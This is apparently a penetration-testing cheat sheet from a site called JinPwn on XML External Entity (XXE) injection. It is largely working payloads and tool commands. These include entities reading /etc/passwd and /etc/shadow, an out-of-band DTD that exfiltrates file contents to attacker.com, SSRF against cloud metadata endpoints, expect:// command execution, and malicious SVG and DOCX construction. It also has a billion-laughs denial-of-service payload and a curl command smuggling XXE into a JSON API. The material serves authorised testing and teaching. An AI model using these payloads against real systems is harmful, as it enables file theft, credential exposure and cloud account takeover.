XXE | JinPwn

Sections XXE

XML External Entity injection. User-supplied XML is parsed with external entities enabled. Read files, SSRF, sometimes RCE.

T=https://target.com

i. Where it lives

XML parsers are everywhere, often hidden:

Obvious:

SOAP endpoints
REST APIs accepting Content-Type: application/xml or text/xml
RSS / Atom feed readers
WebDAV endpoints
XML-RPC interfaces (often at /xmlrpc.php)

Hidden inside other formats (every modern Office doc is a zip of XML):

DOCX, XLSX, PPTX uploads - content.xml, word/document.xml
SVG uploads - entire format is XML
PDF uploads (some processors parse embedded XML metadata)
XMP metadata in images
ICS calendar uploads
KML / KMZ (Google Earth) uploads
OOXML in older Office processors

Inside auth flows:

SAML assertions (signed XML)
WS-Security tokens
XML-based OAuth implementations

Inside DBs and APIs:

GraphQL with XML response support enabled
BaseX, eXist-db, MarkLogic DBs over HTTP

Signal that XML is being parsed:

App accepts XML-shaped bodies and returns parsed content
Filename ends .xml, .svg, .docx, .xlsx
Content-Type: application/xml in request or response
Error messages mention SAXParseException, XMLParser, lxml

ii. Quick detection

Send a request with a basic external entity probe. The classic file-read test:

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]>
<root>&x;</root>

When /etc/passwd contents appear in the response, you’re in.

When you see no body change, switch to OOB blind XXE - see section iv.

iii. Burp + tooling

Burp’s Pro scanner includes active XXE checks. For manual testing in Burp:

Send request to Repeater
Drop in a probe payload from PayloadsAllTheThings
Watch the response

XXEinjector for automated extraction:

ruby XXEinjector.rb --host=oast.live --httpport=8000 --file=request.txt
## Reads request.txt, attempts both direct and OOB XXE, extracts files

oxml_xxe for crafting XXE payloads inside DOCX/XLSX/PPTX:

git clone https://github.com/BuffaloWill/oxml_xxe
ruby ./oxml_xxe.rb
## Loads in browser, lets you build a malicious office doc and download

dotdotpwn for testing file path patterns in XXE responses:

dotdotpwn -m xxe -h target.com -O unix -t 10

Most modern parsers disable inline entity expansion in responses. Use OOB exfiltration via a parameter entity that resolves to your server:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % ext SYSTEM "http://attacker.com/x.dtd">
%ext;
]>
<root>test</root>

Your server hosts x.dtd:

<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker.com/?%data;'>">
%param1;

The target parses your DTD, reads /etc/passwd, sends it back via the exfil URL.

interactsh / Burp Collaborator as the listener:

interactsh-client
## Or use Burp's built-in Collaborator

Many parsers (libxml2 default) accept the external DTD fetch even when in-band entity expansion is disabled.

v. PHP filter chain for base64 file read

When the file you want has bytes that break XML (NULL, control chars), wrap it through PHP filters first. Works only when the target is PHP and php://filter is accessible:

<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">

Returns base64 in the response. Decode on your side.

vi. SVG upload XXE

SVG is XML. Many image-handling pipelines (avatar upload, profile photo) pass SVG through a parser before stripping or converting.

Minimal test SVG:

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg">
<text x="0" y="20">&x;</text>
</svg>

Upload, view the rendered image. The hostname appears in the text.

Variant: librsvg + ImageMagick processing the SVG can be combined with ImageTragick-style exploits.

vii. Office document XXE (DOCX, XLSX, PPTX)

These are zip archives containing XML. Inject XXE into one of the inner XML files:

unzip target.docx -d unpacked/
## Edit unpacked/word/document.xml - inject XXE at top
## Repack:
cd unpacked && zip -r ../malicious.docx .

Then upload to the target’s “open document” feature. Common in cv-parser, doc-to-pdf, OCR services.

viii. SAML XXE

SAML responses are XML. If the SAML library doesn’t disable external entities, you have XXE in an auth flow.

Test by intercepting a SAML response with Burp + SAML Raider extension, injecting an external entity into the assertion, replaying. If the IdP echoes errors or trusts the assertion with injected entities, XXE.

ix. XXE to SSRF

Any URL handler in an entity becomes SSRF. The payload reads from your URL of choice:

<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/">

Standard SSRF targets apply - see WEB12 SSRF . Cloud metadata endpoints are the highest-value (see Cloud Recon section viii for AWS / Azure / GCP IMDS).

Java parsers also support gopher://, ftp://, jar://, sometimes netdoc:// which expand the attack surface.

x. XXE to RCE

Direct RCE via XXE is rare and language-specific:

PHP with expect:// wrapper enabled (rare default):
```
<!ENTITY x SYSTEM "expect://id">
```
Java with jar:// plus crafted JAR fetch (older parsers)
XSLT injection alongside XXE in some processors

For most cases, XXE → file read of credentials → use creds elsewhere → RCE.

xi. Billion laughs (DoS, mostly informational)

Recursive entity expansion exhausts memory:

<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
...
<root>&lol9;</root>

DoS-only, mention in report but don’t trigger on production targets.

xii. Tricks worth knowing

Try without `<?xml` prolog

Some parsers tolerate missing XML declaration. Inject into JSON endpoints that fallback to XML parsing on certain content-types.

Content-Type confusion

Send XML body to a JSON-accepting endpoint:

curl -X POST "$T/api/users" \
  -H 'Content-Type: application/xml' \
  -d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]><user><name>&x;</name></user>'

Some frameworks auto-detect content type and parse based on body shape, not header.

XInclude when full XXE is blocked

XInclude is a separate XML feature that allows inclusion of external resources. Sometimes enabled even when DTD parsing is disabled:

<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>

Don’t forget XSLT

XML processing pipelines sometimes accept XSLT transformations from user input. XSLT abuses include file read, SSRF, and depending on the processor, code execution.

XPath injection is the other XML bug

When user input is concatenated into an XPath query (not in the document but in the query selector), you can extract data similarly to SQLi. Common in LDAP-XPath bridges and XML DBs.

xiii. References

PortSwigger - XXE - best guided lab
PayloadsAllTheThings - XXE
HackTricks - XXE
oxml_xxe - office doc XXE generator
SAML Raider - Burp extension for SAML XXE

xiv. Where it leads

File read → /etc/passwd, /etc/shadow (if readable), SSH keys, app configs, cloud credentials
SSRF via XXE → cloud metadata → cloud takeover via AWS / Azure / GCP
Source code read → find more bugs offline (look for hardcoded creds, SQL queries, deserialization sinks)
SAML XXE → auth bypass / impersonate any user
PHP expect:// → direct RCE → 04 Initial Access

i. Where it lives #

ii. Quick detection #

iii. Burp + tooling #

iv. Blind XXE via OAST #

v. PHP filter chain for base64 file read #

vi. SVG upload XXE #

vii. Office document XXE (DOCX, XLSX, PPTX) #

viii. SAML XXE #

ix. XXE to SSRF #

x. XXE to RCE #

xi. Billion laughs (DoS, mostly informational) #

xii. Tricks worth knowing #

Try without <?xml prolog #

Content-Type confusion #

XInclude when full XXE is blocked #

Don’t forget XSLT #

XPath injection is the other XML bug #

xiii. References #

xiv. Where it leads #